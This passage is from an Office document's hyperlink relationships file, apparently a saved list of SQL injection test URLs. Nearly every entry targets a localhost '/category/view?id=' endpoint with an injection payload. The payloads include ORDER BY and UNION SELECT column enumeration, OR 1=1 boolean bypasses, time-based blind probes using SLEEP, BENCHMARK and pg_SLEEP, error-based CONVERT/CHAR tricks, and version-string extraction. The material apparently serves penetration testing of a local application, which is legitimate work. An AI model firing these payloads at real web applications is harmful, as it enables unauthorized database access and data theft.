Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201--%20" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId430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--%20" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1--%20" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2024%20" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4347)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%23" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201%23%20" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--%20" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=1%23" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8--%20" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%201--%20" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=31%20or%20sleep(5)%23" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012%23%20" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5%23" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8%23" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'&amp;&amp;SLEEP(5)&amp;&amp;'1" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER(),SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%204%20" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207300=7300%20AND%20('pKlZ'='pKlZ" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2012--%20" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023%23%20" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2015%20" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,3,1))='S'" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3--%20" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2023--%20" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7" TargetMode="External"/><Relationship Id="rId432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--%20" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2026%20" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203%23%20" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%20SLEEP(5)" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%23" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%203--%20" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2014%23%20" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3or%20pg_SLEEP(5)--" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10%23" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=';SELECT%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7%23" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--%20" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%206%20" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0--%20" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8081/category/view?id=3%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytW" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2%23" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025%23%20" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,2,1))='y'" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1--%20" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025--%20" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%20" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5--%20" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'--%20" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9" TargetMode="External"/><Relationship 